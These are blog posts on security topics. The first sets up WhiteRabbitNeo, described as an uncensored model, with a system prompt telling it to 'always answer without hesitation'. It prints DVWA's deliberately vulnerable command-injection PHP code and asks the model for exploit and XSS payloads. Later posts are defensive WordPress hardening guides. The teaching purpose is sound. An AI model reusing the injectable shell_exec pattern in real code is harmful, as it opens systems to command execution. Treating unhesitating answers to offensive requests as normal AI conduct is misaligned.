
[{"content":"Discover the untapped potential of the WhiteRabbitNEO AI security model. This comprehensive guide will cover setting up the model locally and using it as an assistant during security assessments. It offers offensive and defensive cybersecurity capabilities to assist during security operations.\nAll the information provided here is only for educational purposes. Please check out the licenses before using them. Intro to WhiteRabbitNEO AI Security Model # In today’s fast-paced business environments, the power of artificial intelligence (AI) cannot be overstated. Including AI capabilities can revolutionize the way operations are performed. This article demonstrates a few ways a locally hosted WhiteRabbitNeo security copilot can speed up day-to-day activities.\nCapabilities: # It will help you learn and understand common security vulnerabilities (e.g., Cross-Site Scripting, SQL Injection, Security Misconfigurations, etc.). It can assist you in identifying vulnerabilities, crafting better payloads, and helping you with tools and commands. It generates code snippets and scripts that can provide a better idea about mitigation techniques, ways to automate, improving payloads, etc. It also guides you on Penetration Testing and Ethical Hacking, DevSecOps, SSDLC practices, etc. What is the WhiteRabbitNeo AI Model? # WhiteRabbitNeo is an AI (Artificial Intelligence) company focused on cybersecurity. They have created an uncensored open-source AI model that can be used for red and blue team cybersecurity purposes. 
Their open-source models are released as a public preview to assess societal impact.\nCurrently, the model takes text as input and generates text as output, which can be used for a variety of natural language processing tasks.\nCheck out WhiteRabbitNeo/Llama-3.1-WhiteRabbitNeo-2-8B\nPreparing the Environment # About My Setup: # A working GNU/Linux based operating system (Debian) Ollama installed Setting up Ollama: https://ollama.com/download Check out my previous article, which includes setting up Ollama and configuring it: https://securityarray.io/ai-powered-security-assistant-with-ollama-and-mistral-locally/ OpenWeb UI - https://openwebui.com/ Memory (RAM) >= 16 GB (Recommended) Disk free space >= 80 GB (Recommended) Model: Llama-3.1-WhiteRabbitNeo-2-8B Downloading the WhiteRabbitNeo-2-8B Model # Let us go ahead and download the model WhiteRabbitNeo/Llama-3.1-WhiteRabbitNeo-2-8B from the Hugging Face repository.\nTo download, ensure git and git-lfs are installed. Then proceed with the git clone.\n# Ensure git-lfs is installed\nsudo apt install git-lfs\n# Clone the repository from Hugging Face (the safetensors weights are stored in LFS)\ngit clone https://huggingface.co/WhiteRabbitNeo/Llama-3.1-WhiteRabbitNeo-2-8B\nDepending on your internet speed, this may take time as it needs to download the large safetensors files. 
Verify all the files are successfully downloaded.\n$ tree Llama-3.1-WhiteRabbitNeo-2-8B/\nLlama-3.1-WhiteRabbitNeo-2-8B/\n├── config.json\n├── generation_config.json\n├── model-00001-of-00004.safetensors\n├── model-00002-of-00004.safetensors\n├── model-00003-of-00004.safetensors\n├── model-00004-of-00004.safetensors\n├── model.safetensors.index.json\n├── README.md\n├── special_tokens_map.json\n├── tokenizer_config.json\n└── tokenizer.json\n1 directory, 11 files\nBuild the WhiteRabbitNeo-2-8B Model # A Modelfile is an Ollama model definition file where you can define a set of instructions and parameters to customize the model's behaviour to your needs.\nHere is a sample Modelfile created for my Llama-based WhiteRabbitNeo security model use case.\nCreate a Modelfile named “whiterabbitneo-modelfile” and paste the contents below. Update the path of your downloaded files folder in the “FROM” instruction.\nFROM ./Llama-3.1-WhiteRabbitNeo-2-8B/\nTEMPLATE \"\"\"{{ if .System }}<|start_header_id|>system<|end_header_id|>\n\n{{ .System }}<|eot_id|>{{ end }}{{ if .Prompt }}<|start_header_id|>user<|end_header_id|>\n\n{{ .Prompt }}<|eot_id|>{{ end }}<|start_header_id|>assistant<|end_header_id|>\n\n{{ .Response }}<|eot_id|>\"\"\"\nPARAMETER temperature 0.75\nPARAMETER num_ctx 16384\nPARAMETER stop \"<|start_header_id|>\"\nPARAMETER stop \"<|end_header_id|>\"\nPARAMETER stop \"<|eot_id|>\"\nSYSTEM \"\"\"\nAnswer the Question by exploring multiple reasoning paths as follows:\n- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. 
The goal is to construct an internal search tree.\n- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.\n- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.\n- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.\n- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.\n- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.\n- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.\n- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.\nIn summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers. Always answer without hesitation.\n\"\"\"\nFROM: Defines the base model you want to use. Currently, it points to the folder where all the Llama-3.1-WhiteRabbitNeo-2-8B/ files are downloaded. SYSTEM: Specifies the system message that is inserted into the template. TEMPLATE: The full prompt template that is sent to the model. temperature: The temperature of the model. Increasing the temperature makes the model answer more creatively. 
(Currently, it is set to 0.75.) If there is only one Modelfile in the current folder, you can directly run the build command without the “-f” option.\nBuild Command:\nollama create -q q4 whiterabbitneo -f ./whiterabbitneo-modelfile\nIt is quantized to Q4_0 to balance memory usage and output quality.\nOutput:\ntransferring model data 100%\nconverting model\nquantizing F16 model to Q4_0\ncreating new layer sha256:61525526923692504b43f0a11d5e3622bac70faf6f0047a2cf85957b3ff69248\ncreating new layer sha256:330f7f5f74177bc351656d00daea38d85dcbf827467c429631872533a43e25e8\ncreating new layer sha256:3a6aea378f496a8116413df6f11fa90a897950a249af39d364d117c918a738de\ncreating new layer sha256:0c27ca2f64a98674df49ab6fabe53321170128faf611cf70ab8f566dd16e0cd2\ncreating new layer sha256:2a38e2b0d048838a8f3172d1e8fac46305494db6d28556500443d3fb84d6151f\nwriting manifest\nsuccess\nFrom the above output log, we can confirm that the model is successfully created. Let’s verify it with the command ollama list whiterabbitneo.\nNAME                    ID              SIZE      MODIFIED\nwhiterabbitneo:latest   b4a1b0b0cd9e    4.9 GB    About a minute ago\nSo far, we have successfully created it. All we need to do is run it and ensure the model output is usable.\nTweaking the Modelfile parameters can help you tune the model to your preferences. Feel free to explore the other options that are available as well. Check out the link below for more information.\nOllama Modelfile: https://github.com/ollama/ollama/blob/main/docs/modelfile.md Alternative 1: Using the WhiteRabbitNeo Model created by other users # Yes, it is possible. Other users have already created the models and uploaded them onto the Ollama registry; you can download them and give them a try as well. The registry may contain both the latest and older builds of the model.\nClick on “Models” and search for “whiterabbit”. 
You will find many.\nFigure 1: Search for WhiteRabbitNeo Models Alternative 2: Using the WhiteRabbitNeo Model created by other users on HuggingFace # Yes, there are other users who have created the models and uploaded them to the Hugging Face repository. We will take one example from TheBloke.\nhttps://huggingface.co/TheBloke/WhiteRabbitNeo-13B-GGUF\nThis user has already created the model and uploaded it to the repo.\nThis is a different revision of the WhiteRabbitNeo model. Figure 2: Download the WhiteRabbitNeo GGUF file from TheBloke’s shared repository. The creation process is the same as what we covered. You need to update the FROM instruction in the Modelfile to point to the downloaded GGUF file, then run the “ollama create” command.\nRunning the WhiteRabbitNeo-2-8B Model # In my case, I am using the Open WebUI Docker instance, so I will reload it to fetch information about the latest models we have created. In some cases, we also need to restart the Docker service for the model to appear in the WebUI interface.\nYou could run it from the CLI as well using the command below.\nollama run whiterabbitneo:latest\nFor readability, I prefer using Open WebUI.\nAfter loading Open WebUI, click “Select a Model” and search for “whiterabbitneo:latest” to ensure it is selected for the following prompts.\nFigure 3: Selecting the WhiteRabbitNeo Model Evaluating the WhiteRabbitNeo-2-8B Model for Security Use Cases # Below are some of the use cases demonstrated for example purposes. You could go ahead and try out the different queries and let me know your comments on them.\nQuestion 1: What is an XXE vulnerability? How can it be exploited, and how can it be mitigated? Give detailed examples. # Output:\nFigure 4: XXE Response Question 2: Find if the code below is vulnerable. If so, write an exploitable proof of concept payload using the curl command. 
# DVWA - Command Injection PHP Code:\n<?php\n\nif( isset( $_POST[ 'Submit' ] ) ) {\n    // Get input\n    $target = $_REQUEST[ 'ip' ];\n\n    // Determine OS and execute the ping command.\n    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {\n        // Windows\n        $cmd = shell_exec( 'ping ' . $target );\n    }\n    else {\n        // *nix\n        $cmd = shell_exec( 'ping -c 4 ' . $target );\n    }\n\n    // Feedback for the end user\n    $html .= \"<pre>{$cmd}</pre>\";\n}\n\n?>\nOutput:\nFigure 5: Command Injection Response Question 3: Write an XSS payload for the following vulnerable field without using the script tags. # <input type=email name=\"email\" value=\"\"> Output:\nFigure 6: Response for XSS Payload Question 4: How do you perform a vulnerability scan with nmap NSE scripts? # Output:\nFigure 7: NMAP Response Question 5: Generate a sample vulnerability reporting template for Command Injection Vulnerability # Output:\nFigure 8: Sample Vulnerability Report Template WhiteRabbitNeo is a model built explicitly for cybersecurity use cases. It is not perfect and can be fine-tuned and improved. Additionally, your responses may differ from the ones shown above. Here is another model on Hugging Face, SecurityLLM. Check out the model file and give it a try. The process of creating it is similar to the above.\nZySec-AI/SecurityLLM\nKeep watching for more models on AI security at Hugging Face.\nConclusions: # So far in this article, we have seen how one of the security AI models (e.g., WhiteRabbitNeo) can be set up locally and used for security use cases. Open-source AI models for security are still in the beta stages, and different researchers are evaluating and improving them. These models still have a lot of room for improvement; their quality ultimately depends on how good the training data is. 
Feel free to try out and experiment with different models and check which best meets your security needs.\nAdditional Information and References: # Hugging Face - https://huggingface.co/WhiteRabbitNeo WhiteRabbitNeo Discord: https://discord.gg/8Ynkrcbk92 Ollama Modelfile: https://github.com/ollama/ollama/blob/main/docs/modelfile.md ","date":"28 September 2024","externalUrl":null,"permalink":"/unlocking-the-power-of-whiterabbitneo-ai-security-model-with-ollama/","section":"Posts","summary":"","title":"Unlocking the power of WhiteRabbitNeo AI Security Model with Ollama","type":"posts"},{"content":"Looking to improve the security of your WordPress website? This step-by-step guide will walk you through how to install the Shield Security plugin for WordPress, one of the tools to secure your WordPress site from potential threats.\nWhat is Shield Security? # Shield Security is an Intrusion Detection and Prevention security plugin for WordPress that helps secure your website from malicious traffic. It monitors malicious traffic, blocks spam bots and spam content, disables anonymous REST API access, supports 2FA, and has many other features designed to keep your website safe and secure.\nKey features and benefits # Automatic IP Blocking: The website owner can check and set the offence count in the settings. After an IP reaches that count, the plugin automatically blocks its traffic. Site Traffic Monitoring: Continuously monitor all site activity and get security insights into your WordPress website in real time. Malware Scanner: The plugin scans your website for known malware and helps keep your website free from viruses (Pro feature). Brute Force and Spam Protection: Shield Security helps protect your website from brute force attacks by rate-limiting attempts and enforcing strong protection. Two-Factor Authentication: The plugin also offers two-factor authentication, an extra layer of security for admin user accounts. 
You can learn more about the complete features of Shield Security on their website.\nPre-Installation Steps # Before installing the Shield Security WordPress plugin, taking a few pre-installation steps is important to ensure a smooth and safe process.\nIn this article, we will focus only on the free version of Shield Security.\nBackup your WordPress website # It’s always a good practice to create a backup of your WordPress website before installing any new plugins. This ensures that you can restore your website to its previous state in case anything goes wrong during installation.\nUpdate WordPress and all plugins # Ensure your WordPress core installation and all other plugins are up to date. Running the latest versions of WordPress and plugins helps ensure compatibility and security.\nInstalling Shield Security Plugin # Log into your WordPress admin account, navigate to “Plugins” -> “Add Plugins”, and search for “Shield Security”.\nFigure 1: Install Shield Security Plugin Once you find the “Shield Security” plugin, click the “Install Now” button.\nFigure 2: Activate Shield Security WordPress Plugin After installation, click the “Activate” button to enable the plugin.\nConfigure Shield Security # A plugin configuration wizard is loaded, which will quickly help you navigate and set up the required features.\nFigure 3: Shield Security - Getting Started A Shield Security menu will be displayed in the WordPress dashboard; from there you can navigate to the plugin. It is a dedicated menu to manage all “Shield Security” plugin features. Click on “Next Step” to go ahead and quickly enable the security features needed. Warning: Note that the setup wizard options may change. Subscribing to Newsletter # The first step involves subscribing to a newsletter. 
You can sign up or click on “Next Step.”\nActivate License: # Figure 4: Activate Your License The next step prompts you to activate the “ShieldPRO” license. As this article only focuses on the free version, I will skip it and click “Next Step.”\nChoose an Initial Security Profile # If you’re a first-time user or just want a quick setup, the “Shield Security” plugin provides multiple profiles to choose from.\nFigure 5: Choose a Shield Security Profile I recommend reviewing the options that each profile enables or disables before you select one. It’s often best to get started with the “Light” or “Medium” profile, as you can change this setting at any time.\nSometimes, stricter security features can conflict with or “break” other functionality on your site. Therefore, it’s safer to start with the “Light” or “Medium” profile, test your site to ensure everything works, and then move toward implementing a more robust security profile.\nSetting up Shield Admin PIN # Figure 6: Setup Admin PIN The plugin displays a form to set up a plugin PIN in the “Security Admin” section. This is an added layer of protection for admins, ensuring only an authorized person can access or modify the security settings.\nKey in the PIN, confirm the PIN, and click on “Turn On Security Admin.” A message stating that the PIN has been successfully set will be displayed, and you will be taken to Bot Settings.\nBot Blocking # Figure 7: Bot Blocking Wizard The next setting is about how to handle bots and malicious traffic. 
Identifying malicious traffic patterns and the bad-bot behaviour ruleset is already taken care of by the plugin vendor.\nAs a website owner, based on your site traffic and user patterns, decide after how many offences you would like to block an IP. The default offence limit is 10. I have set the offence limit to 5 for strict security and the block duration to 1 week.\nTo activate it, click on “Set IP Blocking Options”. After 5 malicious attempts, the IP address will be blocked for 1 week.\nA whitelist option is also available, where admins’ and security researchers’ IPs can be whitelisted as needed.\nThe option “Use CrowdSec Blocklists” is also an added benefit.\nIf an attacker’s IP is flagged on your site for offences, it is shared with CrowdSec, and similarly, IP addresses flagged by other websites are shared with your site. This helps to proactively block malicious attempts at an early stage.\nBrute Force Login Protection # Figure 8: Brute Force Login Protection One of the most common attacks on a WordPress website is the automated brute force attack. The attacker tries to find valid credentials, either by guessing the password of a known user name or by blindly trying a huge list of usernames and passwords. This happens continuously each and every day.\nShield Security Brute Force Login Protection will detect automated attacks and block them before they can be exploited.\nMake sure to “Turn On - Protect my WordPress login from automated attacks”, then click on “Set Login Protection”.\nSometimes, the admin may not be able to log in. Don’t forget to whitelist the admin IP address. Block Spam Comments # Figure 9: Block Spam Comments Spam comments are another common problem among WordPress sites. 
The free version also covers this.\nPlease check “Turn On - Block automated SPAM comments” and click on “Set Comment SPAM Protection” to enable it.\nClick “Go to Shield Overview” on the final thank-you page.\nShield Security Dashboard # Figure 10: Shield Security Dashboard The “Security Overview” dashboard is the place where you can see all the information about security events on your site.\nThe top graph displays the total number of Login Blocks, Bot Detections, Offenses, Connections Killed, IPs Blocked, etc. in the past 7 days, along with a security summary of the website.\nOne of the major reasons I find this plugin useful compared to WordFence is its real-time threat protection and lower memory usage.\nEnable Auto Updates # Just make sure to enable “auto-updates” for the Shield Security plugin, so you don’t need to update it manually every time. I have been using it for more than a couple of years and haven’t seen any breakages so far.\nI hope the above information helps secure your site. The above configuration can quickly help to secure your WordPress site from a good number of attacks. In future articles, I will be posting about detailed hardening steps using the Shield Security plugin.\nShield Security Help # Check out the Shield Security - Getting Started Guide for more help information.\nConclusion # Securing the WordPress website is an important factor for website owners. With the increasing attacks on WordPress, proactive measures like this help secure your online assets.\nShield Security is a free, real-time WordPress security plugin that enhances your website’s security. 
It provides many features, such as blocking malicious comments, bots and attackers, firewall protection, and Two-Factor Authentication.\nDon’t wait until it’s too late; enable it now to reduce security attacks.\n","date":"7 May 2024","externalUrl":null,"permalink":"/how-to-install-and-configure-shield-security-step-by-step-guide/","section":"Posts","summary":"","title":"How to Install and Configure Shield Security: Step-by-step guide","type":"posts"},{"content":"In today’s digital world, WordPress is one of the most widely used Content Management Systems (CMS) for quickly creating websites or blogs. WordPress powers more than 10 million websites across the internet. One of the core reasons behind its popularity is the availability of numerous plugins that extend its functionality and make it user-friendly.\nBelow are statistics on security vulnerabilities by WordPress component, from WPScan.\nFigure 1: WordPress Vulnerable Components Source: WPScan From the above screenshot, we can see that 94% of vulnerabilities are found in WordPress plugins. Using nulled plugins is one of the causes. Nulled WordPress plugins/themes can expose your website to significant security risks and vulnerabilities.\nThis article will provide a comprehensive understanding of what nulled plugins and themes are, their security risks, the alternatives, when you can use them, etc.\n📖 What are Nulled Plugins and Nulled Themes? # A nulled plugin is a modified version of an open-source or premium WordPress plugin distributed for free or at a negligible cost over the Internet through unofficial channels that anyone can download and use.\nSecurity threats apply to both WordPress plugins and themes. 
For premium plugins, the original code is altered and all license limitations are nullified, so you can freely use all the premium capabilities without paying any extra money.\nIn the case of open-source plugins, additional features not part of the official plugin are added to attract users to download and use them.\n🧲 Why are nulled plugins/themes so attractive? # The WordPress ecosystem is a huge market, and you need to decide which plugin suits your requirements. Most free plugins are good for getting started, but as you progress, you might see limitations and require additional features.\nThe above requirements might make you consider premium plugins as an option. But again, you might need to get a premium theme, a premium plugin for forms, etc., as the requirements keep growing.\nConsidering the hosting, plugins, themes, development, official support, etc., it might look expensive, and as humans, we normally look for ways to cut costs or get discounts.\nCost Effective: # Nulled plugins sound like a good deal for small website owners who want to get their site up and running without spending a lot of money.\nSelected Features # Users might need only a few essential features rather than paying for all options. One Subscription - Access to Many Premium Plugins # There are a few unofficial sources on the internet where you can pay once and access multiple premium nulled plugins without paying individually for each plugin. Challenging Experiences # Users might have faced frustrating experiences with unresponsive support, issues due to account lockouts or the inability to register valid user accounts, license activation problems, payment-related issues, etc. Assumed Time Saving # Users might believe it can cut development effort and help build the website faster. 
Overall, nulled plugins might seem like a good deal because they are free, but remember they may contain malware, a backdoor or other security vulnerabilities bundled inside them, which can expose your website to various security threats.\n🔓 Security Threats Associated with Nulled Plugins # In this section we will dig further and understand the security risks associated with nulled plugins:\nOutdated Security Patches # Official plugin developers patch security loopholes when they are reported to them. With a nulled copy, you will miss those patch updates. Missing security patches can leave your website unprotected, and attackers use this opportunity to compromise the site through known security vulnerabilities.\nMalicious Code Injection # One of the major threats associated with nulled WordPress plugins or themes is the possibility of malware injected inside the code.\nBackdoor Access: The injected malicious code can silently provide attackers with access to your website. Attackers can use it to achieve Remote Code Execution (RCE) and completely control your website. The single most common type of backdoor belonged to a PHP backdoor uploader found on 8.68% of remediated websites, while the most persistent backdoor (removed from more than 180,000 files last year) was WordPress specific and concealed within nulled themes. Its ability to self-replicate once it has established a footprint and layers of obfuscation makes it especially challenging to pinpoint and remove.\nFrom Sucuri - Hacked Website Report\nOpen Redirection Attack (Redirection Hack): Whenever users visit your website, the injected code redirects them to a malicious website, with or without clicking any link. This is called an open-redirection attack. Ransomware Attack: The malicious code injected inside the application will encrypt all files on the server and/or the database. To regain access to those encrypted files, you must pay the attacker a ransom to obtain the decryption key. 
Spread Virus: Infected sites can spread the virus as well, and some advanced malware can even self-replicate and use your site as a medium to compromise other systems. Denial of Service (DoS) Attacks: The infected website can be used by attackers to launch a denial-of-service attack against other sites, which can even lead to your domain being blacklisted or marked as spam. Data Breach # Another major issue with nulled plugins is the theft of your website data. An attacker might steal sensitive information such as usernames, passwords, payment-related details (if you are running e-commerce), etc.\nData breaches can cost you a lot when you need to deal with legal consequences and damages. They also impact your business reputation and trust. Sometimes, they can also lead to privacy issues: malware can silently harvest your users’ data and sell it to third-party vendors. 🛡️ Case Study - Criyasoft # Criyasoft is one of a client’s educational websites. It is used to demonstrate feature development in WordPress and is always kept online for students’ reference.\nRecently, it became the victim of an open-redirection attack. After 4 levels of redirection, it took genuine users to a casino website.\nWhat is the Impact? # The “About” page link was tampered with, and whenever a visitor clicked it, they were redirected multiple times and taken to a casino website.\nFigure 2: A Blocked - First Level Redirection Attempt What is the root cause? # After analyzing the site, I found a couple of main reasons, which are listed below.\nOutdated Plugins and Themes - Both plugins and themes were not updated regularly.\nDuring the initial analysis, I discovered that it was just an ad-tracking link, or that it was due to outdated plugins that have known security vulnerabilities. I updated all the plugins and themes. 
I verified that everything was fixed, as the issue was no longer reproducible.\nAfter a few days, the attack pattern started to repeat, and once it started impacting other page links, I realized it was some malicious behaviour affecting the navigation menu links.\nAfter thoroughly evaluating each installed plugin and theme, I discovered that the client had installed a nulled plugin for quick educational purposes instead of purchasing one, and that it contained malicious code.\nNovashare nulled plugin was used - a nulled copy of the Novashare WordPress social share plugin was installed.\nAfter cleaning up the nulled plugin files, the site is back to normal, with continuous security monitoring enabled to prevent further attacks.\nHow was it fixed? # I scanned the site with malware-scanning plugins to find the root cause (I used Malcare).\nFigure 3: Use Malcare After confirmation, I removed the Novashare nulled plugin completely, deleted all its files and updated all the themes and plugins. Additionally, I enabled “auto-updates” for all non-customized plugins and themes.\nLastly, I configured the free “Shield Security” plugin to monitor real-time security alerts and prevent them from further impacting the website.\n⛔ Additional Reasons to Avoid Nulled Plugins # Below are some additional trust concerns you might consider before using any nulled plugins. 
We don’t know what is inside the code, and we need to be prepared for any unexpected behaviour that can cause the site to crash or impact its availability.\nFlagged by Search Engines - Google # If Google finds any malicious behaviour on your website, an additional flag is displayed below your domain with the message “This site may be hacked.” This indicates that users should avoid visiting the website as malicious activity has been spotted.\nFigure 4: Google-Flagging Suspicious Website If you believe you are a victim, check out Google Support for instructions on fixing it.\nRecovering from Nulled WordPress Plugin Damage # Restoring your website after discovering it has been hacked or is causing unexpected behaviour is very time-consuming.\nRestore Backup: Maintaining regular backups lets you quickly restore a known-good snapshot once you identify the impacted behaviour early.\nScanning for Malware or Seeking Professional Assistance: For hacked websites, it’s possible to mitigate the damage and regain control. You need to set up malware scanning solutions such as “Sucuri”, “WordFence”, “Malcare”, etc. to identify infected files. Additionally, don’t hesitate to seek professional assistance if required.\nTime-Consuming: As mentioned earlier, using nulled WordPress plugins or themes might seem time-saving, but damage control requires a lot more time and resources to restore the website to normal.\n⚠️ Remember, official authors or vendors don’t support nulled plugins. Even if they would like to help, they might have limited knowledge of the modified code.\nI hope the above information can help you decide and take the appropriate action with respect to nulled WordPress plugins or themes.\n👍 Best place for Plugins and Themes # Finding safe and reliable WordPress plugins is easy. 
There are many free and paid premium options that you can safely use on your website.\nWordPress Plugins - All WordPress Plugins Directory Figure 5: WordPress Plugins Directory WordPress Themes - All WordPress Themes Directory Additional Tips # For each WordPress plugin or theme, check its reviews or visit its home page, and ensure you are purchasing only from the official authors’ sites. Figure 6: Theme Home Page and Reviews EnvatoElements - Another common place where you can find WordPress plugins and themes. 🤔 Still Using Nulled Plugins? # If you use nulled plugins on production websites, the transition steps below will be helpful, as they can still pose security risks.\nScan for known Vulnerabilities or Malware\nAntivirus and antimalware companies work around the clock to find new malware behaviours and patterns and update their signature databases.\nYou can leverage free online malware scans such as “Sucuri”, “WordFence”, “Malcare”, “VirusTotal”, etc., to check whether the nulled plugins contain malware.\nYou could also check out WordPress Scan for Vulnerabilities: a comprehensive guide for site security (./wordpress-scan-for-vulnerabilities-a-comprehensive-guide-for-site-security.org) to learn more about scanning your WordPress site for vulnerabilities. Once you are confident that no malicious patterns are found, proceed with the next steps of the transition. If any are found, make sure to clean up before proceeding. Transition to Free or Premium Plugins: # Transitioning away from nulled plugins is crucial for maintaining the security and integrity of your WordPress site. The steps below can help you ensure a smooth migration to premium or free plugins with minimal disruption.\nBackup Your Website: Ensure a complete site backup is taken to prevent potential data loss.
Test and Validate alternate plugins: Ensure all features and functionalities work as intended with the new plugins. Remove Nulled Plugins: After successfully evaluating the new plugins, safely remove the nulled plugins from your website, eliminating any potential security risks associated with their usage. Publish Changes: Push all the updated changes into the production environment and ensure that all the functionalities are working as expected. 📝 Conclusion # WordPress nulled plugins or themes might seem an attractive alternative to paying for premium features, but it’s critical to weigh the security risks associated with their use. The potential harm they can cause to your website security is significant, including reputational damage, a drop in your site rankings, a decrease in revenue, etc. Opting for free or trial versions and ensuring all the plugins and themes are up-to-date can minimize security threats.\n🙋 FAQs # What are nulled WordPress Plugins? # A nulled plugin is a modified version of an open-source or premium WordPress plugin distributed for free or at a negligible cost over the Internet through unofficial channels that anyone can download and use.\nAre nulled plugins safe to use? # No, and they should never be installed in production environments.\nWhat are the security risks associated with using nulled plugins? # They can be used as a medium for injecting and spreading malware and exploiting your website with known security vulnerabilities. They may also lead to data theft.\nHow can I avoid using nulled plugins?
# Download and install plugins from reputed sources like the WordPress plugin directory and trusted marketplaces.\n🔗 Additional References: # Why You Should Stop Using Nulled WordPress Themes and Plugins Why you should avoid using Nulled WordPress themes and plugins ","date":"12 April 2024","externalUrl":null,"permalink":"/security-threats-of-nulled-wordpress-plugins-and-themes-uncovering-the-hidden-dangers/","section":"Posts","summary":"","title":"Security Threats of Nulled WordPress Plugins and Themes: Uncovering the Hidden Dangers","type":"posts"},{"content":"Discover the essential tips and best practices for enhancing the security of WordPress sites. Owners can analyze security risks, install recommended plugins, monitor continuously, and tweak configurations, which can help keep their sites safe from potential threats.\nThe major focus of this article is to provide detailed, step-by-step instructions to help website owners take action with easy-to-follow steps. Even non-technical users will be able to follow along and secure their WordPress sites.\nUnderstanding the Importance of WordPress Security # It is reasonable for users to think that WordPress’s security must be taken care of by the provider itself. Let’s understand how the WordPress ecosystem works.\nAbout WordPress Software # WordPress is a dynamic open-source content management system that is freely available to anyone who wants to set up a publishing website.\nThe WordPress core is continuously hardened against the vulnerability classes that have been identified and reported as part of the OWASP Top 10. Also, recommended security best practices are provided for authors developing third-party plugins and themes.\nThe WordPress Team’s responsibility covers identifying and resolving the security issues in the core software provided. It’s a community project that is used across 10 million websites on the internet.
Any programmer can create a third-party plugin or theme based on their needs.\nFigure 1: WordPress Security From the above, even after providing secure guidelines and getting the code reviewed by volunteers, security bugs can sometimes be missed, or newly found bugs need to be fixed accordingly.\nTo proactively mitigate security vulnerabilities before attackers find them, the WordPress Security team also runs a Bug Bounty program at HackerOne as an additional measure, so that security researchers can report any security vulnerabilities they identify and make the platform more secure.\nIn extreme cases, the WordPress security team even goes as far as removing a vulnerable plugin from the directory if the plugin owner doesn’t fix it, or fixing it themselves.\nThird-party plugins and themes are reviewed for security to a certain extent. In addition to the WordPress software, the security of the underlying operating system used, configurations, database servers, secure file transfers, TLS security, and web servers are all equally important.\nThe WordPress team is actively working on mitigating security defects in WordPress Core, Plugins, and Themes. However, the security of all underlying technologies and ensuring all the updates are patched falls under the Owner’s responsibility.\nIf your hosting provider takes care of your underlying tech stack, it is your responsibility to ensure the core, themes, and plugins are updated and downloaded from recommended websites.\nAbout Managed WordPress # When you come to Managed WordPress (i.e., wordpress.com), you just need to register, pay according to your package preference, and start publishing right away.\nManaged WordPress uses the same WordPress Core Software.
The underlying technology, like setting up software and managing the web server and other resources, is completely handled by the Automattic team.\nAuthors need to focus only on creating content for their niche.\nThe Vital Need for Security # Based on the above choices, the security requirements do vary. A managed service is the best option for most website owners and companies. However, there are cases where website owners require more customizability or manage multiple websites. In those cases, users prefer the self-hosted version of WordPress.\nGoing forward, we will focus only on the security needs of self-hosted WordPress websites. We will set up a WordPress site and start securing it step by step.\nCybercriminals are constantly looking for new ways to exploit vulnerabilities and compromise website security. Any security weakness on a site can be an opportunity for attackers. As a WordPress website owner, securing the business and customer data hosted on your website is the most crucial task.\nSucuri ranked WordPress as the most infected CMS in 2022. Below are statistics on vulnerabilities by WordPress component, from wpscan.\nFigure 2: Vulnerable WordPress Components Most of the vulnerabilities were found in third-party plugins, and a few of them in themes. Attackers leverage these vulnerabilities to gain unauthorized access to your website, spread malware, steal sensitive information, or even disrupt the functionality of your site. As a result, proactive efforts can help you secure your website.\nDefense in Depth: Security is always about minimizing risk by adding as many layers of protection as possible. It’s more of a risk-reduction strategy.\nBoth technical and non-technical users can follow the content covered in this article.\nIf, by any chance, you are using another third-party vendor to manage “WordPress” for you,
check out their support page to understand what is covered in terms of security and what needs to be taken care of by yourself.\nBackup your WordPress site # Before making any changes to your website, the first thing to do is to ensure that a complete website backup is taken and can be easily restored at any time. This precautionary measure will be helpful in case any unexpected issues arise, so that data integrity is never compromised.\n🚧 The backup copy should always be placed in a separate location, different from the one where you have hosted your WordPress website.\nIt would be a disaster if you lost the backup copy and all the site contents were tampered with or completely lost in a security attack.\nHaving a Scheduled Backup # On-demand backups are a good thing to have. However, having a scheduled backup is still crucial for a website.\nTaking backups at regular intervals can help you restore in case of a security incident or human mistakes. You can set the frequency based on how much new data is being added to your site.\nYou can adjust the backup intervals from minutes to days based on the criticality of the data. This is one of the important things to check while choosing a hosting provider.\nCheck out how to back up your WordPress site by Syed Balkhi.\nKeeping WordPress core, Themes, and Plugins updated # One of the most essential steps is to keep your site updated with the latest version of the WordPress core, theme, and plugins being used.\nOutdated plugins always pose security risks. From the above stats, we can understand that 94% of the attacks originated from third-party plugins. Keeping the site updated can help you prevent a lot of attacks.
This simple step can mitigate a lot of attacks for you.\nLog into your WordPress site using an admin account and navigate to “Dashboard” - “Updates”.\nOn your updates dashboard, you should be able to see information about which items require updates.\nFigure 3: WordPress Dashboard - Updates Information Currently, our WordPress Core is already updated, and the latest version is present on the server, i.e., Version 6.4.3. The 5 plugins installed on the above server require updating. The updates can be for many reasons, like new feature releases or bug fixes. You can always click on the “View version x.x.x details” link, which will take you to the Changelog, where a detailed list of what has been changed and what has been improved is available. WordPress Core is automatically updated with security releases. An Admin can see all the available updates.\nThe “Updates” section of the WordPress dashboard contains information about all the updates needed for your website, such as the WordPress core, plugins, and themes. You can easily update all the necessary plugins.\n❗Points to Remember\nEnsure all your custom-coded application functionality is free from conflicts. Verify all Plugins, Themes, and Core are compatible with the versions and tech stack you are using. Enable auto-updates for WordPress Plugins and Themes # Navigate to the “Plugins” section in the dashboard, which is displayed below.\nFigure 4: WordPress Plugin Updates The “Plugins” page is where you can manage all your plugins and update them all at once.\nFor any plugins that you think are not very impactful to your website, you can click on the “Enable auto-updates” button. It will check daily for the latest updates available.
